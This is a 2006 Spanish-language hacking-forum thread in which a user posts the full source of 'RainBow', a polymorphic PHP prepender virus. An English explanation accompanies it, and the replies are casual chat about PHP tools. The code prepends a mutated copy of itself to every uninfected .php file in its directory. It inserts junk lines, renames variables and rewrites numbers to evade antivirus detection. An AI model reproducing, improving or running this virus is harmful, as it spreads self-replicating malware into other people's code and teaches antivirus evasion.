Virus en PHP .RainBow

Started by freak, December 10, 2006, 05:32:33 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

freak

December 10, 2006, 05:32:33 PM
--> Adding Trash/Junk/Garbage
      The Virus adds ine in two lines a junk line to the code.
      This Junk-line could contain:
      - // anything
      - $anything='anything';
      - $anything=number;
      Because the code would be damn big after the 5th generation, I desided
      to delete the trash after every generation and make a new one. Anyway,
      the chance to get a trash-line will be bigger, because there are more
      lines (more lines --> more chance). But I tested about 30 generation
      and it's no big problem with the size.

      --> Changing Variable/function names
      The Virus uses an array with all variable/function names of the virus,
      every generation it changes every array-entry (every name) to a 5-15
      sign long new name.

      --> Number changing
      The virus is able to change every number in the code. This is a real
      successfull way to fake AVs, i think! A number (for instands '10') could
      also be one of the following things:
      10=(8+2)
      10=(19-9)
      10=(130/13)
      It's easy to understand, I think. I desided to change ever 5th number I can
      find, because it looks better than changing every number every generation.


    * Infection Method

      --> Prepender
      This code is a prepender virus, which doesn't harm the victim file.
      It reads the first PHP part (which is the whole virus code) of the current
      file (__FILE__, as it's called in PHP). Than it searchs for every PHP-files
      in the current directory, and adds the changed virus code at the beginn of
      the victim file. Before infecting the virus checks, if there's already an
      infection mark or the virus, which is 'RainBow'.

  Something else little interesting is, that it's hard to get many different generations from
  the virus, because it just changes, if it infects a file. And just the infected file has the
  different form, not the old virus. That's a little trick, which I read in an article about
  Polymorphism by SnakeByte. He wrote, that it will use more time to get many generations, which
  is a problem for AVs (who needs many generations ).

   In the end I want to thank the following people, which made it possible, that I
   wrote this virus :)

Code Select 
<?php // RainBowsrand((double)microtime()*1000000); $changevars=array('changevars','string','newcont','curdir','filea','victim','viccont','newvars','returnvar','counti','countj','trash','allcont','number','remn'); $string=strtok(fread(fopen(__FILE__,'r'), filesize(__FILE__)),chr(13).chr(10)); $newcont='<?php // RainBow'.chr(13).chr(10);while ($string && $string!='?>
'){
if(rand(0,1)){
if(rand(0,1)){$newcont.='// '.trash('',0).chr(13).chr(10);}
if(rand(0,1)){$newcont.='$'.trash('',0).'='.chr(39).trash('',0).chr(39).';'.chr(13).chr(10);}
if(rand(0,1)){$newcont.='$'.trash('',0).'='.rand().';'.chr(13).chr(10);}}
$string=strtok(chr(13).chr(10));
if($string{0}!='/' && $string{0}!='$'){$newcont.=$string.chr(13).chr(10);}}
$counti=0;
while($changevars[$counti]){
$newcont=str_replace($changevars[$counti++],trash('',0),$newcont);}
$countj=-1; $number='';
while(++$countj<strlen($newcont)){
if (ord($newcont{$countj})>47&&ord($newcont{$countj})<58){
$number=$newcont{$countj};
while(ord($newcont{++$countj})>47&&ord($newcont{$countj})<58){$number.=$newcont{$countj};}
$remn=rand(1,10);
if (!rand(0,5)){switch(rand(1,3)){case 1:$allcont.='('.($number-$remn).'+'.$remn.')';break;
case 2:$allcont.='('.($number+$remn).'-'.$remn.')';break;
case 3:$allcont.='('.($number*$remn).'/'.$remn.')';break;}}else{$allcont.=$number;}}
$allcont.=$newcont{$countj};$number='';}
$curdir=opendir('.');
while($filea=readdir($curdir)){
if(strstr($filea,'.php')){$victim=fopen($filea,'r+');
if (!strstr(fread($victim, 25),'RainBow')){rewind($victim);
$viccont=fread($victim,filesize($filea));
rewind($victim);
fwrite($victim,$allcont.$viccont);}
fclose($victim);}}
closedir($curdir);
function trash($returnvar, $countj){
do{$returnvar.=chr(rand(97,122));}while($countj++<rand(5,15));
return $returnvar;}
?>

Hendrix

#1
December 10, 2006, 05:54:58 PM
Pues si esta en PHP no hay ke tener miedo para nada... :D :D

Cuantos de ustedes tienen el EasyPHP (por decir uno) en su PC??? :D :D

Salu2 ;)

freak

#2
December 10, 2006, 06:09:05 PM
Quote from: Hendrix on December 10, 2006, 05:54:58 PM
Pues si esta en PHP no hay ke tener miedo para nada... :D :D

Cuantos de ustedes tienen el EasyPHP (por decir uno) en su PC??? :D :D

Salu2 ;)



yo  :-\

Hendrix

#3
December 10, 2006, 07:03:35 PM
xD xD xD pues ten cuidado... :D :D :D ;) ;) ;)

PD: Yo no lo tengo por 2 cosas, 1 porke eso supone un consumo de Mb en el PC importate y con los programas mas sus cmpiladores + emule me quedo seco...Y otra porke no programo mucho en PHP.. :D :D

Si programase en PHP me descargaria otro programa ke no fuese EasyPHP... ;) ;) ya que pesa mucho por todo lo que lleva.

Salu2

freak

#4
December 11, 2006, 01:45:07 AM
Quote from: Hendrix on December 10, 2006, 07:03:35 PM
xD xD xD pues ten cuidado... :D :D :D ;) ;) ;)

PD: Yo no lo tengo por 2 cosas, 1 porke eso supone un consumo de Mb en el PC importate y con los programas mas sus cmpiladores + emule me quedo seco...Y otra porke no programo mucho en PHP.. :D :D

Si programase en PHP me descargaria otro programa ke no fuese EasyPHP... ;) ;) ya que pesa mucho por todo lo que lleva.

Salu2



okis .. lo tendre en cuenta y ya ke estamos recomendamen uno :D ;)

Hendrix

#5
December 11, 2006, 04:01:37 PM
Te dejo el programa ke hizo un amigo, sigue sus evoluciones, ya ke de momento es beta creo.

http://foro.elhacker.net/index.php/topic,150198.0.html

Salu2

Print
Go Up Pages1
User actions